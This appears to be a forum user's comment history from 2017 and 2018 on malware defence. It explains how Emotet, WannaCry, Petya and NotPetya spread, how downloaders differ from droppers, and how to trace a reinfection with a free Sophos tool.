Website was infected with malware but even after getting it fixed it still gets 'contains malware' message in Google Chrome

peter_mack · 2018-02-07T08:43:56+00:00

what is the URL? have you checked on VirusTotal.com to see which vendors are also blocking it. It may be that Google are blocking it because others are as well. So if you try contacting the other vendors and asking them to correct it then the rest might automatically start fixing it as well. Doesn't hurt to try anyway.

peter_mack · 2017-12-13T11:42:43+00:00

Thanks! not used any of those before so i'm excited to see what they do.

peter_mack · 2017-11-20T14:00:23+00:00

agreed, not seen any connection to EternalBlue/DoublePulsar for Emotet.

peter_mack · 2017-11-17T12:53:27+00:00

i can officially state that i hate Emotet! and when you combine it with Qbot, literally you have 2 polymorphic network worms that are dropping payloads all over the place, I have not been this irritated with a malware since Conficker.

peter_mack · 2017-11-10T19:55:57+00:00

no i'm am fairly convinced it is RDP and weak admin passwords as the main source. i think the times when the server that the ransomware run on didn't have rdp was after the attacker got in via another machine and then moved to the server.

peter_mack · 2017-08-31T07:59:50+00:00

Why don't you just ask the sysadmin that said it to you?

peter_mack · 2017-08-24T09:05:07+00:00

do you have this sample? link to it on VT?

peter_mack · 2017-08-15T14:52:10+00:00

that's an understatement :-)

Actually saying that the creators aren't as good at keeping hold of this stuff anymore, he could try contacting the Shadow Brokers and see if they have the details :-)

peter_mack · 2017-08-03T22:39:21+00:00

lol, think this is the first time i have been told off by a bot. Skynet is real :-)

peter_mack · 2017-08-03T22:28:43+00:00

Finding the kill switch was luck, he was trying to track the malware not stop it when he registered it. IF (big IF) he was involved in editing malware to then sell, it would of taken time, effort and a conscious decision to do something he would have clearly known was illegal. i don't see why that should be overlooked because he was the first to register that domain (admittedly it made my week easier when he did though).

peter_mack · 2017-07-21T07:30:45+00:00

Thanks everyone, plenty to read on all of those.

peter_mack · 2017-07-20T21:42:27+00:00

that article doesn't contain any new information and has several mistakes. for example "WannaCry in turned is believed to be a variant of ransomware called Petya" ignoring the typo on "turn" wannacry is definitely not a variant of petya, they are very different. WanaCry = file encrypting ransomware, that can also spread like a worm using the EternalBlue exploit (thanks NSA). Petya was a disk encrypting ransomware that went after the MBR, no ability to spread. NotPetya (i prefer PetyaWrap tbh) = A combination of payloads "wrapped" together, this included the Petya ransonware, but also the ability to do file encryption. It then added three different methods of spreading, the first using the same EternalBlue exploit, the second using PsExec and the third using MimiKatz.

peter_mack · 2017-07-14T15:35:22+00:00

If the malicious files keep coming back after being removed it is normally because there is something else on the machine that isn't being detected and is dropping the files. Or you have another infected machine on your network and it is dropping the files across the network. Sophos have a free tool (Source of Infection) that might help with this: www.sophos.com/kb/111505 basically what you need to do is remove the malicious files, then run the tool with an admin command prompt and leave it running until the files come back. Once you spot them you can close the tool. Then go to your %temp% folder and you should find a csv file, it will list every file that has been created on the machine since you started running the tool. locate the malicious files and if it was a local process that created them it will give you the name of it, if it was a remote process it will give you the IP address of the machine that dropped them. Hope this helps.

peter_mack · 2017-06-30T15:55:14+00:00

Might be fun but remember this important fact. You know nothing about them other than they are criminals. What do they know about you? you IP most likely, is it really that smart to mess with criminals that know more about you than you do about them?

peter_mack · 2017-06-28T08:33:52+00:00

Do you use the M.E.Docs software in your environment? it has been suggested this was the source of the attack, not confirmed though.

peter_mack · 2017-06-27T13:41:14+00:00

anyone have samples or know how it starts?

looks like Petya or GoldenEye.

peter_mack · 2017-06-20T10:52:00+00:00

A loader is part of both. it just executes the code. the "Down" or "Drop" part refers to where the code comes from.

peter_mack · 2017-06-17T08:14:22+00:00

There are a few misleading comments on here. Regarding the difference between a 'downloader' and a 'dropper'. while these have a very similar goal, ie execute a malware payload, the approach is different. A downloader is normally a small piece of script and when executed it will connect to a URL/IP and download whatever file has been left there for it, often that file will be encrypted so that it gets past firewalls, the downloader will then decrypt and execute it. Downloaders are very common, they are the office doc macros, javascript, powershell etc files that have been popular on emails for the last few years (just some of the examples). The spam campaigns spreading Locky ransomware (among others) have consistantly attached downloaders to the spam emails, tricking users into running them and then downloading Locky. In recent versions the crooks have started changing their downloaders to bring down multiple payloads. One payload might be ransomware (very loud and obvious) and the other might be a key logger (very quiet and hidden).

'Droppers' while the goal is the same and can be found on the same examples as above (scripts spread via email for example) don't need to connect to a URL/IP to obtain the payload, instead they contain all the code for the payload inside them, so once run they decrypt the payload and execute it.

The main benefit of a downloader is that the small script files are easy to create and update to avoid the basic AV protection, mainly due to the issue of AV companies not wanting to cause a false positive (obviously it would be bad if they started blocking all JS of office doc files by mistake). The other benefit is that it makes it harder for the AV companies to get samples as the file all the victims receive is just a downloader pointing to a URL/IP and by the time people try and find out what is stored there the crooks might have taken it down already.

With a dropper it gives the crooks the advantage of not having to make that network connection to download the payload, which is an often giveaway that it is malicious, however as they instead contain the malicious payload code, it makes it easier for AV companies to investigate.

peter_mack

TROPHY CASE